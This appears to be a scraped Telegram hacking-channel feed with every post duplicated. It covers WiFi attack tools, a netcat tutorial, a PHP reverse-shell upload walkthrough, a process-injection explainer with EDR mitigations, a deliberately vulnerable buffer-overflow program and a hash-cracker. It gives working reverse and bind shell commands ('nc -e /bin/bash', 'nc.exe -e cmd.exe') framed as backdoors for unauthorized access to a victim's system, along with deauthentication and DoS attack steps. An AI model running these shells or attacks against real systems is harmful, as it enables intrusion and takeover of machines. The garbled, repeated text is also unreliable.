β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ You can take three steps to protect your Android device :
t.me/undercodeTesting
1) SSL encryption of the device: SSL is one of the best ways to protect sensitive data in transit.
2) Test third-party apps: Try to install apps from first-party vendors such as Google. If you do purchase the application from a third-party store, please use the mobile security vendor to audit the security / authenticity of any third-party code / library used in the mobile application. Read the permissions required by the application before downloading. An example of a permission application that can request a potentially dangerous signal is to allow disclosure of your identity or location or send mail to the Internet.
3) Be wary of SMS Trojan horses: implement control measures to prevent unauthorized access to paid resources. If you request payment via SMS, please proceed with caution.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ You can take three steps to protect your Android device :
t.me/undercodeTesting
1) SSL encryption of the device: SSL is one of the best ways to protect sensitive data in transit.
2) Test third-party apps: Try to install apps from first-party vendors such as Google. If you do purchase the application from a third-party store, please use the mobile security vendor to audit the security / authenticity of any third-party code / library used in the mobile application. Read the permissions required by the application before downloading. An example of a permission application that can request a potentially dangerous signal is to allow disclosure of your identity or location or send mail to the Internet.
3) Be wary of SMS Trojan horses: implement control measures to prevent unauthorized access to paid resources. If you request payment via SMS, please proceed with caution.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦what is Hijacker ?
> Hijacker is a penetration testing tool with a graphical user interface. The tool integrates several well-known WiFi penetration tools, such as Aircrack-ng, Airodump-ng, MDK3, Reaver, etc. Hijacker provides a simple and easy-to-use UI interface, users do not have to manually enter commands or copy and paste MAC addresses on the console.
> This application is only available in the Android version (ARM) and requires the device to have a wireless network card that supports Monitor Mode. Currently only a few devices are eligible, so you may need to use custom firmware
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦what is Hijacker ?
> Hijacker is a penetration testing tool with a graphical user interface. The tool integrates several well-known WiFi penetration tools, such as Aircrack-ng, Airodump-ng, MDK3, Reaver, etc. Hijacker provides a simple and easy-to-use UI interface, users do not have to manually enter commands or copy and paste MAC addresses on the console.
> This application is only available in the Android version (ARM) and requires the device to have a wireless network card that supports Monitor Mode. Currently only a few devices are eligible, so you may need to use custom firmware
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Hack wifi steps
A) information collection
1. View available WiFi hotspots around, including hidden hotspots;
2. View specific network and client activities by analyzing signals and data packets;
3. Count hotspot confidence;
4. View manufacturer information of hotspot devices;
5. View device signals Strength;
6. Save the captured data packet (.cap file);
B) Wireless attack
1. De-
authenticate (
drop ) all clients of a specific / non-specific network; 2. De- authenticate ( drop ) of specific clients; 3. Launch MDK3 beacon flood attacks with specific options;
4 Do MDK3 identity authentication DoS attacks against specific networks or users;
5. Capture WPA handshake packets and crack WEP networks;
6. Reaver WPS crack attacks;
C) other
1. Copy command or MAC address to clipboard;
2. Integrate dependent components without manual installation;
3. Integrate nexmon driver and related management components;
4. Use custom dictionary to crack .cap file;
5. Use parameter to filter wireless Hotspots;
6. Export all collected information to files;
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Hack wifi steps
A) information collection
1. View available WiFi hotspots around, including hidden hotspots;
2. View specific network and client activities by analyzing signals and data packets;
3. Count hotspot confidence;
4. View manufacturer information of hotspot devices;
5. View device signals Strength;
6. Save the captured data packet (.cap file);
B) Wireless attack
1. De-
authenticate (
drop ) all clients of a specific / non-specific network; 2. De- authenticate ( drop ) of specific clients; 3. Launch MDK3 beacon flood attacks with specific options;
4 Do MDK3 identity authentication DoS attacks against specific networks or users;
5. Capture WPA handshake packets and crack WEP networks;
6. Reaver WPS crack attacks;
C) other
1. Copy command or MAC address to clipboard;
2. Integrate dependent components without manual installation;
3. Integrate nexmon driver and related management components;
4. Use custom dictionary to crack .cap file;
5. Use parameter to filter wireless Hotspots;
6. Export all collected information to files;
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦BEST WIFI HACKING TOOLS :
t.me/UndercodeTesting
1) http://www.aircrack-ng.org/
2) http://sourceforge.net/projects/airsnort/
3) http://www.oxid.it/cain.html
4) http://www.kismetwireless.net/
5) http://www.stumbler.net/
6) http://www.inssider.com/
7) https://www.wireshark.org/
8) http://sourceforge.net/projects/cowpatty/
9) http://sourceforge.net/projects/airjack/
10) http://wepattack.sourceforge.net/
11) http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer
12) http://www.tamos.com/products/commwifi/
13) https://crack.sh/
14) https://github.com/FluxionNetwork/fluxion
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦BEST WIFI HACKING TOOLS :
t.me/UndercodeTesting
1) http://www.aircrack-ng.org/
2) http://sourceforge.net/projects/airsnort/
3) http://www.oxid.it/cain.html
4) http://www.kismetwireless.net/
5) http://www.stumbler.net/
6) http://www.inssider.com/
7) https://www.wireshark.org/
8) http://sourceforge.net/projects/cowpatty/
9) http://sourceforge.net/projects/airjack/
10) http://wepattack.sourceforge.net/
11) http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer
12) http://www.tamos.com/products/commwifi/
13) https://crack.sh/
14) https://github.com/FluxionNetwork/fluxion
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Anti-malware tools: key features comparison
Pro trial period (d) > Menu
languages > Real-time
protection Scheduling Quarantine
Malwarebytes 14 26 βοΈ βοΈ βοΈ
HitmanPro 30 20 βοΈ βοΈ βοΈ
Emsisoft 30 19 βοΈ βοΈ βοΈ
AVG 30 22 βοΈ βοΈ βοΈ
Spybot Search & Destroy N/A 7 β βοΈ βοΈ
Windows MSRT N/A 25 β β β
iolo System Defense 30 8 βοΈ βοΈ βοΈ
Zemana Antimalware 30 41 βοΈ βοΈ βοΈ
Comodo Free Antivirus N/A 27 βοΈ β βοΈ
Avast Free Antivirus 60 1 βοΈ βοΈ βοΈ
GridinSoft Anti-Malware N/A 26 βοΈ βοΈ βοΈ
IObit Malware Fighter 30 32 βοΈ β βοΈ
Xvirus Anti-Malware N/A 14 βοΈ βοΈ βοΈ
STOPzilla 15 2 βοΈ βοΈ βοΈ
Malware Killer N/A 1 β β βοΈ
Kaspersky Internet Security 30 14 βοΈ βοΈ βοΈ
Trend Micro Internet Security 30 20 βοΈ βοΈ βοΈ
Norton Security 30 17 βοΈ βοΈ βοΈ
Total Defense Antivirus 30 1 βοΈ βοΈ βοΈ
RogueKiller Anti-malware N/A 6 β βοΈ βοΈ
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Anti-malware tools: key features comparison
Pro trial period (d) > Menu
languages > Real-time
protection Scheduling Quarantine
Malwarebytes 14 26 βοΈ βοΈ βοΈ
HitmanPro 30 20 βοΈ βοΈ βοΈ
Emsisoft 30 19 βοΈ βοΈ βοΈ
AVG 30 22 βοΈ βοΈ βοΈ
Spybot Search & Destroy N/A 7 β βοΈ βοΈ
Windows MSRT N/A 25 β β β
iolo System Defense 30 8 βοΈ βοΈ βοΈ
Zemana Antimalware 30 41 βοΈ βοΈ βοΈ
Comodo Free Antivirus N/A 27 βοΈ β βοΈ
Avast Free Antivirus 60 1 βοΈ βοΈ βοΈ
GridinSoft Anti-Malware N/A 26 βοΈ βοΈ βοΈ
IObit Malware Fighter 30 32 βοΈ β βοΈ
Xvirus Anti-Malware N/A 14 βοΈ βοΈ βοΈ
STOPzilla 15 2 βοΈ βοΈ βοΈ
Malware Killer N/A 1 β β βοΈ
Kaspersky Internet Security 30 14 βοΈ βοΈ βοΈ
Trend Micro Internet Security 30 20 βοΈ βοΈ βοΈ
Norton Security 30 17 βοΈ βοΈ βοΈ
Total Defense Antivirus 30 1 βοΈ βοΈ βοΈ
RogueKiller Anti-malware N/A 6 β βοΈ βοΈ
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Penetration test tool tutorial: How to use the > Netcat (nc.exe), Netcat actual combat tutorial by undercode :
π¦ WHAT IS NETCAT (kali-parrot tool ) ?
Netcat is very easy and versatile at the same time, like trying to explain everything you can do with a Swiss army knife.
To give some examples:-
1) Get logo
2) Bind the shell (backdoor)
3) to chat with
4) File upload and download
5) Port scan
6) Knock on the port
7) Forwarding port
8) Display web server HTTP file content
9) When you type nc -h in the terminal of kali Linux , there are many options in netcat to enhance its functions and effects. Before diving into the details of its work, you must know that here we use two systems, one as the attacker and the other as the target system.
π¦Penetration test tool tutorial: How to use the > Netcat (nc.exe), Netcat actual combat tutorial by undercode :
π¦ WHAT IS NETCAT (kali-parrot tool ) ?
Netcat is very easy and versatile at the same time, like trying to explain everything you can do with a Swiss army knife.
To give some examples:-
1) Get logo
2) Bind the shell (backdoor)
3) to chat with
4) File upload and download
5) Port scan
6) Knock on the port
7) Forwarding port
8) Display web server HTTP file content
9) When you type nc -h in the terminal of kali Linux , there are many options in netcat to enhance its functions and effects. Before diving into the details of its work, you must know that here we use two systems, one as the attacker and the other as the target system.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to use netcat ? Knocking Port (Port blasting)
1) open kali Linux terminal and type the following command, which contains the IP and port number of the target goal.
nc 192.168.1.21 2222
2) Therefore, when a given command is executed, it will tell the hidden running service by tapping on the port, as can be seen from the image given below that port 2222 is open for SSH.
π¦ Anti-shelling is
1) mainly an attacker using netcat as a backdoor for unauthorized access to the target system, where the attacker activates the listening port (random port) when scanning any vulnerable targets.
2) nc-e/bin/bash192.168.1.214444 Theabove command will wait for the reverse connection of the victim's system. In the given screenshot, you can see that the running website suffered from the os command injection vulnerability. Now use nc -e / bin / bash 192.168.1.21 4444 to establish a connection between the victim and the attacker system, which will allow Create backdoors for unauthorized access.
π¦Netcat as a backdoor :
download netcat.exe for windows and enter the following command
> nc.exe 192.168.1.21 4444 -e cmd.exe
> nc -lvp 4444
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to use netcat ? Knocking Port (Port blasting)
1) open kali Linux terminal and type the following command, which contains the IP and port number of the target goal.
nc 192.168.1.21 2222
2) Therefore, when a given command is executed, it will tell the hidden running service by tapping on the port, as can be seen from the image given below that port 2222 is open for SSH.
π¦ Anti-shelling is
1) mainly an attacker using netcat as a backdoor for unauthorized access to the target system, where the attacker activates the listening port (random port) when scanning any vulnerable targets.
2) nc-e/bin/bash192.168.1.214444 Theabove command will wait for the reverse connection of the victim's system. In the given screenshot, you can see that the running website suffered from the os command injection vulnerability. Now use nc -e / bin / bash 192.168.1.21 4444 to establish a connection between the victim and the attacker system, which will allow Create backdoors for unauthorized access.
π¦Netcat as a backdoor :
download netcat.exe for windows and enter the following command
> nc.exe 192.168.1.21 4444 -e cmd.exe
> nc -lvp 4444
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦REVERSE SHELL & File upload exploitation
We will understand how an attacker can exploit a file upload vulnerability through the netcat shell. It is clear from the given images that the target web server allows its clients to upload images.
youtube.com/undercode
π¦ππΌπ'π πππΈβπ :
1) For uploading, we use php-reverse-shell.php instead of the php backdoor image. Open this web shell to edit the listener IP, which is your kali Linux IP (192.168.1.21), and then use the following command to activate netcat, which will wait for the reverse connection to be established with the victim system.
nc -lvp 1234
2) For uploading, we use php-reverse-shell.php instead of the php backdoor image. Open this web shell to edit the listener IP, which is your kali Linux IP (192.168.1.21), and then use the following command to activate netcat, which will wait for the reverse connection to be established with the victim system.
nc -lvp 1234
3) Now upload your php backdoor on the web server and execute the file connecting the victim's system from the attacker's machine.
4) Therefore, you can see that the attacker successfully made unauthorized access through the netcat shell.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦REVERSE SHELL & File upload exploitation
We will understand how an attacker can exploit a file upload vulnerability through the netcat shell. It is clear from the given images that the target web server allows its clients to upload images.
youtube.com/undercode
π¦ππΌπ'π πππΈβπ :
1) For uploading, we use php-reverse-shell.php instead of the php backdoor image. Open this web shell to edit the listener IP, which is your kali Linux IP (192.168.1.21), and then use the following command to activate netcat, which will wait for the reverse connection to be established with the victim system.
nc -lvp 1234
2) For uploading, we use php-reverse-shell.php instead of the php backdoor image. Open this web shell to edit the listener IP, which is your kali Linux IP (192.168.1.21), and then use the following command to activate netcat, which will wait for the reverse connection to be established with the victim system.
nc -lvp 1234
3) Now upload your php backdoor on the web server and execute the file connecting the victim's system from the attacker's machine.
4) Therefore, you can see that the attacker successfully made unauthorized access through the netcat shell.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
YouTube
UNDERCODE
FREE AI & CYBERSECURITY TRICKS & MALWARE ANALYSIS HACKS, DAILY MEMES & MINDβBENDING TECH MYSTERIESβ¦ ALL ON UNDERCODE!
Stop Scrolling! FREE Cyber & AI Secrets!
UnderCode News: Cyber & Tech Scoops 24/7 β https://UndercodeNews.com
Daily CVE: Fresh Vuln Alertsβ¦
Stop Scrolling! FREE Cyber & AI Secrets!
UnderCode News: Cyber & Tech Scoops 24/7 β https://UndercodeNews.com
Daily CVE: Fresh Vuln Alertsβ¦
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦HTTP requests
use Netcat to obtain web page information from a web server. With Netcat, you can search the full HTTP header to see the specific site that is running in the web server.
1) Now type the following command to connect to port 80.
> nc 192.168.1.11 80
> OPTIONS / HTTP / 1.0
π¦Port scanning :
Netcat can also scan TPC and UDP ports, so it can be used instead of NMAP, it will tell us the opening and closing ports of the target IP The
following command displays the target IP and port range
-z: Zero I / O mode [for scanning]
-w: timeout for connection and final network read
-v: -v verbose
-l: listen mode for inbound connections
-n: digital IP address only,
From the resulting image, you can see that there are open ports for running services.
π¦Chat
Netcat for further chat between two systems. We need to put Netcat together to listen to specific ports on both systems and connect to specific addresses.
?> nc -lvp 5678
π¦File transfer
As you know, in windows we have now downloaded the netcat.exe file, I have used it to upload the text file t.txt on the target system through a specific port.
> nc 192.168.1.21 5555 & lt; t.txt
> nc -lvp 5555 & gt; /root/Desktop/t.txt
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦HTTP requests
use Netcat to obtain web page information from a web server. With Netcat, you can search the full HTTP header to see the specific site that is running in the web server.
1) Now type the following command to connect to port 80.
> nc 192.168.1.11 80
> OPTIONS / HTTP / 1.0
π¦Port scanning :
Netcat can also scan TPC and UDP ports, so it can be used instead of NMAP, it will tell us the opening and closing ports of the target IP The
following command displays the target IP and port range
-z: Zero I / O mode [for scanning]
-w: timeout for connection and final network read
-v: -v verbose
-l: listen mode for inbound connections
-n: digital IP address only,
From the resulting image, you can see that there are open ports for running services.
π¦Chat
Netcat for further chat between two systems. We need to put Netcat together to listen to specific ports on both systems and connect to specific addresses.
?> nc -lvp 5678
π¦File transfer
As you know, in windows we have now downloaded the netcat.exe file, I have used it to upload the text file t.txt on the target system through a specific port.
> nc 192.168.1.21 5555 & lt; t.txt
> nc -lvp 5555 & gt; /root/Desktop/t.txt
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ BACKDOOR & REVERSE SHELL WITH NETCAT(KALI-PARROT..TOOL) FULL
#SUPPORT & SHARE
T.me/UndercodeTesting
#SUPPORT & SHARE
T.me/UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Best Free SSL Certificate Sources :
> https://letsencrypt.org/
> https://www.comodo.com/
> https://www.cloudflare.com/
> https://www.sslforfree.com/
> https://in.godaddy.com/web-security/ssl-certificate
> https://www.geotrust.com/
> https://www.gogetssl.com/
> https://www.instantssl.com/
> https://www.ssl.com/certificates/free/
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Best Free SSL Certificate Sources :
> https://letsencrypt.org/
> https://www.comodo.com/
> https://www.cloudflare.com/
> https://www.sslforfree.com/
> https://in.godaddy.com/web-security/ssl-certificate
> https://www.geotrust.com/
> https://www.gogetssl.com/
> https://www.instantssl.com/
> https://www.ssl.com/certificates/free/
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
letsencrypt.org
Let's Encrypt
Let's Encrypt is a free, automated, and open Certificate Authority brought to you by the nonprofit Internet Security Research Group (ISRG). Read all about our nonprofit work this year in our 2024 Annual Report.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦WHAT IS Process injection :
> This technique involves the execution of malicious code and injecting the same into another running valid process, thereby causing the process to execute the code while preventing suspicion and evading detection.
> This allows the malicious code to run using the processβs memory, resources and elevated privileges. In addition, it allows the code to potentially evade suspicion from security solutions such as host-based firewalls, antivirus, EDRs and so on, as the code is running under a valid process.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦WHAT IS Process injection :
> This technique involves the execution of malicious code and injecting the same into another running valid process, thereby causing the process to execute the code while preventing suspicion and evading detection.
> This allows the malicious code to run using the processβs memory, resources and elevated privileges. In addition, it allows the code to potentially evade suspicion from security solutions such as host-based firewalls, antivirus, EDRs and so on, as the code is running under a valid process.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Real-world examples of process injections in action
T.me/UndercodeTesting
1) DoublePulsar
An analysis of the kernel mode payload of the famous DoublePulsar code by F-Secure revealed that it utilizes a form of DLL injection to load a DLL into a target process (in this case, lsass.exe) using an Asynchronous Procedure Call (APC). It did not utilize the standard Windows API commands such as LoadLibrary and did not write the DLL to disk, making it stealthier.
2) Cobalt Strike
Cobalt Strike is a penetration testing software that was designed to execute targeted attacks and emulate post-exploitations actions of advanced threat actors through a listener called a beacon.
> Cobalt Strike commands such as keylogger, screenshot and so on were designed to be injected into another process for it to work. The listener is injected into a specific process (a personal favorite is explorer.exe because the process is always running in a GUI environment) and the keystroke logger will monitor all keystrokes via the infected process. It then reports them to the beacon console without writing to disk. This only stops when the process terminates or the keystroke logger job is terminated by the user.
3) Lazarus Group
The Lazarus Group (also known as βHidden Cobraβ) is a threat group headquartered in North Korea whose malicious activities span across multiple years, as far back as 2009. Since 2016, the group has been conducting βFASTCashβ attacks β stealing money from ATMs from target banks in Africa and Asia. The target bankβs network is compromised and a malware known as Trojan.Fashcash is deployed on the network.
> An analysis of the malware reveals that malicious Advanced Interactive eXecutive (βAIXβ) executable files are injected into legitimate processes on the payment application servers used in handling ATM transactions. The executable allows the group to monitor, intercept and generate responses to fraudulent transaction requests using fake ISO 8583 (standard used for financial transaction messaging) messages. This allows attempts to withdraw cash via an ATM to be successful.
4) APT41
APT41 is a threat group headquartered in China and known for carrying out Chinese state-sponsored espionage campaigns dating as far back as 2012.
> The group is known for its software supply chain attacks, where TTPs developed from accessing video game production environments are utilized. These TTPs are used to compromise software companies and malicious codes are injected into software updates distributed to victim organizations.
5) WINTERLOVE is a backdoor used by the group to load and execute remote code in a running process (e.g., iexplorer.exe) and can be used to enumerate system files and directories.
6) Mitigation/prevention
DLL injection is not necessarily a bad technique as many applications use it for legitimate purposes such as your Antivirus/Endpoint Detection and Response (βEDRβ)7 solutions which inject their own codes/agents into running processes in order to monitor the process and detect abnormal activities. Therefore, making it hard to detect especially since it runs under a legitimate process.
π¦Behavior analysis
1) This method can be achieved by configuring your EDRs to detect cross-process events such as injection of code into a running process, duplicate processes running, remote threads and so on.
2) EDRs work by gathering, monitoring and analyzing endpoint activities/events. This gives the security team the necessary visibility to carry out further analysis, detection, investigation and mitigation into advanced cyber threats across all endpoints running an EDR.
3) As part of their response capabilities, EDRs can be configured to block certain types of process injection, depending on the behavior that occurs during the injection process.
Stay home, stay safe
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Real-world examples of process injections in action
T.me/UndercodeTesting
1) DoublePulsar
An analysis of the kernel mode payload of the famous DoublePulsar code by F-Secure revealed that it utilizes a form of DLL injection to load a DLL into a target process (in this case, lsass.exe) using an Asynchronous Procedure Call (APC). It did not utilize the standard Windows API commands such as LoadLibrary and did not write the DLL to disk, making it stealthier.
2) Cobalt Strike
Cobalt Strike is a penetration testing software that was designed to execute targeted attacks and emulate post-exploitations actions of advanced threat actors through a listener called a beacon.
> Cobalt Strike commands such as keylogger, screenshot and so on were designed to be injected into another process for it to work. The listener is injected into a specific process (a personal favorite is explorer.exe because the process is always running in a GUI environment) and the keystroke logger will monitor all keystrokes via the infected process. It then reports them to the beacon console without writing to disk. This only stops when the process terminates or the keystroke logger job is terminated by the user.
3) Lazarus Group
The Lazarus Group (also known as βHidden Cobraβ) is a threat group headquartered in North Korea whose malicious activities span across multiple years, as far back as 2009. Since 2016, the group has been conducting βFASTCashβ attacks β stealing money from ATMs from target banks in Africa and Asia. The target bankβs network is compromised and a malware known as Trojan.Fashcash is deployed on the network.
> An analysis of the malware reveals that malicious Advanced Interactive eXecutive (βAIXβ) executable files are injected into legitimate processes on the payment application servers used in handling ATM transactions. The executable allows the group to monitor, intercept and generate responses to fraudulent transaction requests using fake ISO 8583 (standard used for financial transaction messaging) messages. This allows attempts to withdraw cash via an ATM to be successful.
4) APT41
APT41 is a threat group headquartered in China and known for carrying out Chinese state-sponsored espionage campaigns dating as far back as 2012.
> The group is known for its software supply chain attacks, where TTPs developed from accessing video game production environments are utilized. These TTPs are used to compromise software companies and malicious codes are injected into software updates distributed to victim organizations.
5) WINTERLOVE is a backdoor used by the group to load and execute remote code in a running process (e.g., iexplorer.exe) and can be used to enumerate system files and directories.
6) Mitigation/prevention
DLL injection is not necessarily a bad technique as many applications use it for legitimate purposes such as your Antivirus/Endpoint Detection and Response (βEDRβ)7 solutions which inject their own codes/agents into running processes in order to monitor the process and detect abnormal activities. Therefore, making it hard to detect especially since it runs under a legitimate process.
π¦Behavior analysis
1) This method can be achieved by configuring your EDRs to detect cross-process events such as injection of code into a running process, duplicate processes running, remote threads and so on.
2) EDRs work by gathering, monitoring and analyzing endpoint activities/events. This gives the security team the necessary visibility to carry out further analysis, detection, investigation and mitigation into advanced cyber threats across all endpoints running an EDR.
3) As part of their response capabilities, EDRs can be configured to block certain types of process injection, depending on the behavior that occurs during the injection process.
Stay home, stay safe
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Buffer Overflow Example :
This is an example of a very bad coding practices that introduces a buffer overflow. The purpose of this code is to serve as a demonstration a
#include <stdio.h>
void secretFunction()
{
printf("Omar's Crappy Function\n");
printf("This is a super secret function!\n");
}
void echo()
{
char buffer[20];
printf("Please enter your name:\n");
scanf("%s", buffer);
printf("You entered: %s\n", buffer);
}
int main()
{
echo();
return 0;
}
> The char buffer[20]; is a really bad idea.
> You can compile this code or use the already-compiled binary here.
π¦For 32 bit systems you can use gcc as shown below:
gcc vuln.c -o vuln -fno-stack-protector
For 64 bit systems
gcc vuln.c -o vuln -fno-stack-protector -m32
-fno-stack-protector disabled the stack protection. Smashing the stack is now allowed. -m32 made sure that the compiled binary is 32 bit. You may need to install some additional libraries to compile 32 bit binaries on 64 bit machines.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Buffer Overflow Example :
This is an example of a very bad coding practices that introduces a buffer overflow. The purpose of this code is to serve as a demonstration a
#include <stdio.h>
void secretFunction()
{
printf("Omar's Crappy Function\n");
printf("This is a super secret function!\n");
}
void echo()
{
char buffer[20];
printf("Please enter your name:\n");
scanf("%s", buffer);
printf("You entered: %s\n", buffer);
}
int main()
{
echo();
return 0;
}
> The char buffer[20]; is a really bad idea.
> You can compile this code or use the already-compiled binary here.
π¦For 32 bit systems you can use gcc as shown below:
gcc vuln.c -o vuln -fno-stack-protector
For 64 bit systems
gcc vuln.c -o vuln -fno-stack-protector -m32
-fno-stack-protector disabled the stack protection. Smashing the stack is now allowed. -m32 made sure that the compiled binary is 32 bit. You may need to install some additional libraries to compile 32 bit binaries on 64 bit machines.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Modern Encryption Algorithms :
fb.com/UndercodeTesting
1) Digital encryption
AES β AES stands for Advanced Encryption Standard, originally called Rijndael, itβs the specification for encryption published by the National Institute for Standards and Technology (NIST) back in 2001. It puts plaintext through a number of βtransformation roundsβ determined by key size, each round consists of several processing steps. Letβs not stray too far into the weeds on this one. AES is a common algorithm with SSL/TLS. It replaced the Data Encryption Standard (DES) that was created in 1977.
2) RSA β RSA stands for Rivest-Shamir-Adlemen, after its creators, it is a public key encryption algorithm (asymmetric) that has been around since 1978 and is still widely used today. It uses the factorization of prime numbers to encipher plaintext.
3) [Fun Fact: The unfortunately named Clifford Cocks, a mathematician employed by the GCHQ, a British intelligence agency, invented an equivalent system five years earlier, in 1973, but it wasnβt declassified until 1997.]
4) ECC β ECC stands for Elliptic Curve Cryptography, which relies on the algebraic structure of elliptical curves over finite fields. Although ECC has been around since 1985, itβs only been in use since about 2004. ECC has distinct advantages over RSA and is likely going to play a more prominent role in the future of SSL/TLS.
5) PGP β PGP stands for Pretty Good Privacy, it was created in 1991 by Phil Zimmerman. Itβs really more of a collection of algorithms than a single one, all for hashing, data compression and both public and private key cryptography. Each step uses a different algorithm. PGP has been criticized for poor usability, a lack of ubiquity and for the length of its keys.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Modern Encryption Algorithms :
fb.com/UndercodeTesting
1) Digital encryption
AES β AES stands for Advanced Encryption Standard, originally called Rijndael, itβs the specification for encryption published by the National Institute for Standards and Technology (NIST) back in 2001. It puts plaintext through a number of βtransformation roundsβ determined by key size, each round consists of several processing steps. Letβs not stray too far into the weeds on this one. AES is a common algorithm with SSL/TLS. It replaced the Data Encryption Standard (DES) that was created in 1977.
2) RSA β RSA stands for Rivest-Shamir-Adlemen, after its creators, it is a public key encryption algorithm (asymmetric) that has been around since 1978 and is still widely used today. It uses the factorization of prime numbers to encipher plaintext.
3) [Fun Fact: The unfortunately named Clifford Cocks, a mathematician employed by the GCHQ, a British intelligence agency, invented an equivalent system five years earlier, in 1973, but it wasnβt declassified until 1997.]
4) ECC β ECC stands for Elliptic Curve Cryptography, which relies on the algebraic structure of elliptical curves over finite fields. Although ECC has been around since 1985, itβs only been in use since about 2004. ECC has distinct advantages over RSA and is likely going to play a more prominent role in the future of SSL/TLS.
5) PGP β PGP stands for Pretty Good Privacy, it was created in 1991 by Phil Zimmerman. Itβs really more of a collection of algorithms than a single one, all for hashing, data compression and both public and private key cryptography. Each step uses a different algorithm. PGP has been criticized for poor usability, a lack of ubiquity and for the length of its keys.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Crack hashes in seconds.
t.me/undercodeTesting
π¦ Features
1) Automatic hash type identification
2) Supports MD5, SHA1, SHA256, SHA384, SHA512
3) Can extract & crack hashes from a file
4) Can find hashes from a directory, recursively
5) Multi-threading
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/s0md3v/Hash-Buster.git
2) Cracking a single hash
You don't need to specify the hash type. Hash Buster will identify and crack it under 3 seconds.
Usage: buster -s <hash>
3) Finding hashes from a directory
Yep, just specify a directory and Hash Buster will go through all the files and directories present in it, looking for hashes.
Usage: buster -d /root/Documents
4) Cracking hashes from a file
Hash Buster can find your hashes even if they are stored in a file like this
simple@gmail.com:21232f297a57a5a743894a0e4a801fc3
{"json@gmail.com":"d033e22ae348aeb5660fc2140aec35850c4da997"}
surrondedbytext8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918surrondedbytext
Usage: buster -f /root/hashes.txt
5) Specifiying number of threads
Multi-threading can incredibly minimize the overall speed when you have a lot of hashes to crack by making requests in parallel.
> buster -f /root/hashes.txt -t 10
β verified by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Crack hashes in seconds.
t.me/undercodeTesting
π¦ Features
1) Automatic hash type identification
2) Supports MD5, SHA1, SHA256, SHA384, SHA512
3) Can extract & crack hashes from a file
4) Can find hashes from a directory, recursively
5) Multi-threading
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/s0md3v/Hash-Buster.git
2) Cracking a single hash
You don't need to specify the hash type. Hash Buster will identify and crack it under 3 seconds.
Usage: buster -s <hash>
3) Finding hashes from a directory
Yep, just specify a directory and Hash Buster will go through all the files and directories present in it, looking for hashes.
Usage: buster -d /root/Documents
4) Cracking hashes from a file
Hash Buster can find your hashes even if they are stored in a file like this
simple@gmail.com:21232f297a57a5a743894a0e4a801fc3
{"json@gmail.com":"d033e22ae348aeb5660fc2140aec35850c4da997"}
surrondedbytext8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918surrondedbytext
Usage: buster -f /root/hashes.txt
5) Specifiying number of threads
Multi-threading can incredibly minimize the overall speed when you have a lot of hashes to crack by making requests in parallel.
> buster -f /root/hashes.txt -t 10
β verified by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Reverse Engineer References:
http://www.sweetscape.com/010editor/
http://www.hexworkshop.com/
http://ridiculousfish.com/hexfiend/
http://www.hiew.ru/
https://mh-nexus.de/en/hxd/
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Reverse Engineer References:
http://www.sweetscape.com/010editor/
http://www.hexworkshop.com/
http://ridiculousfish.com/hexfiend/
http://www.hiew.ru/
https://mh-nexus.de/en/hxd/
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Sweetscape
010 Editor - Pro Text/Hex Editor | Edit 300+ Formats | Fast & Powerful | Reverse Engineering
